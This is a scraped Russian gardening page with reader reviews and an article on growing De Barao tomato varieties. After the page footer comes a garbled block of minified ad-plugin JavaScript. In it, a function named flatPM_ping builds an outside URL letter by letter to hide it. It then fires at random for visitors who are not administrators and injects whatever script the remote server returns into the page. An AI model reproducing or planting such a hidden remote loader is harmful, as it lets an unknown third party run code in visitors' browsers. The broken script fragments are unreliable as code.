Это один из моих любимых сортов. Вкусный, урожайный. Почти не болеет. Выращиваю в теплице, формирую в 2 стебля, семена сею свои.

Заметил интересную особенность: если взять пасынки от самой ранней рассады, укоренить их и высадить в теплицу, то на них первая кисть завязывается не над 9 листом, как положено сорту, а гораздо ниже, над 3-4 листом. Такие кусты вырастают не больше метра, но урожай дают на 2-3 недели раньше, чем обычные.

Ирина, 36 лет, г. Барнаул

Выращиваю в теплице несколько лет подряд по 3-4 куста разных «Де Барао» – золотой, розовый и черный. Все очень нравятся, особенно в смешанных маринадах. Вкусно и красиво, шкурки не трескаются. В свежем виде «Де Барао черный» лучше всех. Хорошо хранится, бурые плоды дозревают в помещении без потери вкуса.

Светлана, 51 год, г. Кимры

«Де Барао черный» – мой любимец. Каждый год отличный урожай. Сорт не капризный, но нужно регулярно подкармливать: кусты мощные, сильно истощают почву. При недостатке питания начинают болеть вершинной гнилью. От этой беды помогает опрыскивание кальциевой селитрой. Других проблем не было ни разу.

Марина, 39 лет, г. Нижний Новгород

Давно выращиваю этот сорт, и менять пока не собираюсь. Все нравится: плодов много, вкусные, красивые, удобные для консервации. Сажаю в теплицу, по 3 куста на метр. При регулярных поливах растут отлично. Фитофтора их не трогает, если обрывать все листья до нижней кисти. Первое время кусты вообще не формировала, но нарастало очень много зелени, а сами помидорки мельчали. Теперь формирую в 2-3 ствола и прищипываю после 7-й кисти. Урожая с десятка растений нашей семье хватает и на закатки, и поесть летом.

Видео по теме статьи

Предлагаем читателям посмотреть видеоролик по теме статьи:

Окончила МГРИ им. Орджоникидзе. По основной специальности – горный инженер-геофизик, а значит человек с аналитическим складом ума и разнообразными интересами. Имею собственный дом в деревне (соответственно, опыт огородничества, садоводства, грибоводства, а также возни с домашними животными и птицей). Фрилансер, в отношении своих обязанностей перфекционист и «зануда». Любитель хенд-мейда, создатель эксклюзивных украшений из камней и бисера. Страстный почитатель печатного слова и трепетный наблюдатель всего, что живет и дышит.

Нашли ошибку? Выделите текст мышкой и нажмите:

В помощь садоводам и огородникам разработаны удобные приложения для Android. В первую очередь это посевные (лунные, цветочные и т. д.) календари, тематические журналы, подборки полезных советов. С их помощью можно выбрать день, благоприятный для посадки каждого вида растений, определить сроки их созревания и вовремя собрать урожай.

И перегной, и компост по праву являются основой органического земледелия. Их присутствие в почве значительно увеличивает урожай и улучшает вкусовые качества овощей и фруктов. По свойствам и внешнему виду они очень похожи, но путать их не стоит. Перегной – перепревший навоз или птичий помет. Компост – перепревшие органические остатки самого разного происхождения (испортившаяся пища с кухни, ботва, сорняки, тонкие веточки). Перегной считается более качественным удобрением, компост более доступен.

Никакой природной защиты у томатов от фитофтороза нет. Если фитофтора нападает, гибнут любые помидоры (и картошка тоже), что бы ни было сказано в описании сортов («сорта, устойчивые к фитофторозу» – лишь маркетинговый ход).

От сортовых помидоров можно получить «свои» семена для посева на следующий год (если сорт очень понравился). А с гибридными это делать бесполезно: семена-то получатся, но они будут нести наследственный материал не того растения, с которого взяты, а его многочисленных «предков».

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

Новинка американских разработчиков – робот Tertill, выполняющий прополку сорняков в огороде. Прибор придуман под руководством Джона Доунза (создателя робота-пылесоса) и работает при любых погодных условиях автономно, передвигаясь по неровной поверхности на колесах. При этом он срезает все растения ниже 3 см встроенным триммером.

Фермер из Оклахомы Карл Бернс вывел необычный сорт разноцветной кукурузы, получивший название Rainbow Corn («радужная»). Зерна на каждом початке – разных цветов и оттенков: коричневые, розовые, фиолетовые, голубые, зеленые и др. Такого результата удалось добиться путем многолетнего отбора наиболее окрашенных обычных сортов и их скрещивания.

Один из самых удобных методов заготовить выращенный урожай овощей, фруктов и ягод – заморозка. Некоторые полагают, что замораживание приводит к потере питательных и полезных свойств растительных продуктов. В результате проведенных исследований ученые выяснили, что снижение пищевой ценности при заморозке практически отсутствует.

«Морозостойкие» сорта садовой земляники (чаще просто – «клубника») так же нуждаются в укрытии, как и обычные сорта (особенно в тех регионах, где бывают бесснежные зимы или морозы, чередующиеся с оттепелями). У всей земляники корни поверхностные. Это означает, что без укрытия они вымерзают. Уверения продавцов в том, что земляника «морозостойкая», «зимостойкая», «переносит морозы до −35 ℃» и т. д. – обман. Садоводы должны помнить о том, что корневую систему земляники еще никому не удавалось изменить.

Описание и характеристика помидор Де Барао

Сегодня, владельцы дач и огородов часто пытаются найти высокоурожайные сорта овощей и фруктов. Особым спросом пользуются томаты. Благодаря многолетним опытам селекционеров, каждый человек может приобрести любые семена или рассаду для посадки на собственном участке. Среди многочисленных видов пасленовых, наиболее популярны помидоры Де Барао.

Описание и характеристика помидор Де Барао

Отличительная черта томатов Де Барао – это высокорослость и сортовое различие. Каждый садовод может сам выбрать себе подходящий вид помидоров, по собственным предпочтениям.

Характеристика сортов Де Барао

Томаты Де Барао известны всему миру своей древовидной структурой кустов. Выращивая растение из семян или же из рассады, можно получить высокий куст (до 3 метров в высоту) с многочисленными боковыми побегами. Но, из-за своей высокорослости, растению очень тяжело самостоятельно расти и развиваться. Поэтому, их часто подвязывают к шпалерам.

Отдельного внимания стоит описание сортов Де Барао. Этот томат имеет большое количество плодоносящих веток. Созревание плодов происходит только через 120 дней с момента посадки (при использовании семян). Листва Де Барао средних размеров, поверхность ее бархатистая, а цвет – темно-зеленый. В период цветения куст смотрится наиболее красиво. На его побегах появляются мелкие желтые цветки, которые в зависимости от характеристики сортовой принадлежности, располагаются после 3-11 листков.

Описание плодов также имеет свои особенности. Помидоры этих сортов имеют средние размеры (60-90 грамм), но их количество на одном кусте может удивить не опытного садовода. При правильной посадке и уходе, можно получить до 10 кг плодов с одного квадратного метра площади земельного участка. Вкус Дебарау также имеет свои отличия от других сортов. Мякоть помидора очень нежная, сладкая с отчетливой кислинкой. Такие овощи отлично подойдут для употребления в свежем виде, а также для консервации. Де Барао особенные помидоры они обладают способностью сохранять свою плотность даже при использовании в закатках.

Цвет плодов помидоров Де Барао может быть разным. В зависимости от сортовой принадлежности, они могут быть: желтыми, черными, красными, оранжевыми и розовыми.

На фото или видео плоды выглядят как игрушечные шарики. К тому же, каждый из видов Де Барао имеет свои собственные показатели урожайности, а также требования по выращиванию и уходу. Посадка томата может совершаться, как в открытый грунт, так и в теплице. Наилучшие показатели урожайности и развития самой культуры наблюдаются именно в парниковых условиях.

Почему сорта помидора Де Барао пользуются популярностью?

По многочисленным отзывам садоводов, томаты Де Барао являются одними из самых востребованных на современном рынке.

Дело в том, что сами плоды если это сорт настоящих помидор Де Барао обладают нежным незабываемым вкусом. К тому же, выращивание таких сортов не доставит даже неопытному садоводу больших хлопот. Те люди, которые уже успели оценить по достоинству преимущества выращивания сортов томатов Де Барао, утверждают что эти пасленовые имеют:

  • высокую урожайность;
  • широкий спектр применения плодов;
  • пригодность к выращиванию в любом типе грунта;
  • стойкость к различным болезням;
  • «мясистость» и сочность плодов;
  • красивый внешний вид кустов.

Но, решив приобрести семена или рассаду томатов Де Барао, важно найти нужный сорт, который подойдет для выращивания в определенных климатических условиях. Дело в том, что отдельные виды культуры имеют свои особенности не только по посадке, но и по уходу. К тому же, урожайность и даже вкусовые качества плодов могут у разных сортов отличаться.

Разновидность сортов Де Барао

Многообразие разновидностей сорта придётся по душе любому садоводу

Многочисленная разновидность помидоров Де Барао позволяет подобрать каждому человеку наиболее подходящий сорт не только по вкусовым качествам плодов, но и по отдельным особенностям выращивания. Специалисты выделяют:

  1. Томат Де Барао Черный. Выращивается, как в теплице, так и в открытом грунте. К тому же, по многочисленным отзывам садоводов, черный томат отлично чувствует себя под пленкой в парнике. Как и все Де Барао, этот – позднеспелый. Урожая ждать придется 120-130 дней от посева. Отличительными чертами этого сорта является форма плодов. Она продолговатая, а конец их заостренный. К тому же, черные помидоры очень мясистые и сладкие.
  2. Оранжевый. Этот сорт обладает хорошим иммунитетом к фитофторозу. Плоды не растрескиваются.
  3. Золотой. Плод такого сорта имеет желтый цвет. Он продолговатый с заостренным концом. Отдельного внимания стоит урожайность томата Де Барао Золотой. С одного куста можно собрать до 4 кг овощей.
  4. Красный. Плоды этого сорта мясистые, кисло-сладкие. Они отлично предаются хранению и транспортировке, за что Де Барао Красный так и популярен.

Положительные отзывы дачных обывателей и опытных селекционеров, связаны с большим количеством преимуществ томатов. Наибольшее внимание к себе привлек сорт Де Барао Золотой. Отчасти, это связано с необычным цветом плода, а также с его размерами (один помидор может быть до 100 грамм). К тому же, как и любой томат Де Барао, этот сорт – высокоурожайный.

Не менее популярен и сорт Гигант Де Барао, по фото и виде5о отличить эти сорта практически невозможно. Отчасти, это связано с основными преимуществами сорта. Он отлично переносит перепады температуры, плоды имеют большой вес (до 150 гр., а с одного куста можно собрать до 7 кг овощей). Но, есть и недостатки. Гигант рекомендуется выращивать только в теплицах.

Посадка томата

Решив выбрать в качестве посадочного материала семена, следует знать об особенностях выращивания сильной рассады Де Барао. Делать это нужно в парнике или теплице. Лучше всего использовать под посев семян небольшой ящик с плодородным грунтом. Для удобрения подойдет перегной. Также можно купить уже готовую почвосмесь. Сама посадкасемян проста:

  1. Необходимо обработать грунт под посадку слабым раствором марганца.
  2. Высадить семена на расстоянии 1 см друг от друга.
  3. Полить почву небольшим количеством воды.
  4. Накрыть ящик полиэтиленом и убрать его на подоконник или же в теплицу.

Ростки должны появиться уже через полтора месяца. К высадке в открытый грунт они будут готовы только к 70 дню. До этого момента, следует активно поливать ростки. Также важно снять пленку с ящика. Растения должны привыкать к новым для себя условиям. Важно, чтобы этот период совпал с потеплением. Заморозки уничтожат слабую рассаду, поэтому следует быть осторожным. Сама посадка на земельном участке производится в небольшие лунки, глубиной 5-7 см. Почва должна быть удобренной. На одном квадратном метре умещаются 4 саженца.

Молодые растения рекомендуется укрыть плёнкой

Опытные садоводы советуют накрывать рассаду полиэтиленом, если высока вероятность ночных заморозков. Лучше всего подойдет мини-парник. Сделать его несложно. Достаточно установить металлические дуги на месте посадки и прикрепить к ним полиэтилен. Так, молодые растения будут защищены от внешней угрозы.

Особенности агротехники сортов Де Барао

Де Барао – сортовое растение. Такой томат не является гибридом. Поэтому, и требования по уходу за таким овощем особенные. Агротехника помидора Де Барао состоит из: полива, формовки, удобрения и сезонного удаления цветений. Так как это растение высокорослое, нельзя забывать и про его подвязку. Она имеет свои особенности:

  1. Подвязывать побеги можно, как к шпалере, так и к огуречной сетке.
  2. Если нет специальных приспособлений для опоры, ею может стать любое дерево или даже забор. Главное, посадить овощ в нужном месте.
  3. Установка опоры должна проводиться в первые дни после посадки помидор, так как более поздние мероприятия могут навредить корневой системе растений.

Полив также имеет свои особенности. Помидоры таких сортов обладают развитой корневой системой, которая обеспечивает силами все свои побеги. Поэтому, Де Барао нуждается в большом количестве влаги. Лучше всего, поливать кусты один раз в 4 дня. К тому же, под каждое растение следует вливать по 20-30 литров воды. Важно, чтобы сам полив совершался под корень. Попадание воды на листву, стебель или плоды может стать причиной заражения томата различными болезнями. К тому же сам овощ может растрескаться.

Формирование куста, независимо от того, где выращивается культура (на улице или в теплице), происходит в 1 или 2 стебля. Все лишние пасынки необходимо удалять. К тому же, важно следить и за состоянием листьев. Все сухие и пожелтевшие следует оборвать. Некоторые садоводы, также рекомендуют избавляться и от листвы на нижних побегах. Такие действия помогут растению активнее расти и развиваться.

Удобрять помидоры лучше всего в период наливания плодов. В качестве подкормки можно использовать отстоянный раствор куриного помета или коровяка. Его вносят вместе с поливом по пропорции 1:10 (если помет 1:20) 3 раза за один сезон. Лучше всего между подкормками делать перерыв по 2 недели.

Советы от опытных садоводов

Де Барао – сорт, известный своим активным развитием. На нем постоянно появляются новые побеги, листья, а также соцветия. На то, чтобы обеспечить необходимой энергией, растению нужна подкормка. Но, что делать, если сезон плодоношения уже подходит к концу?

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};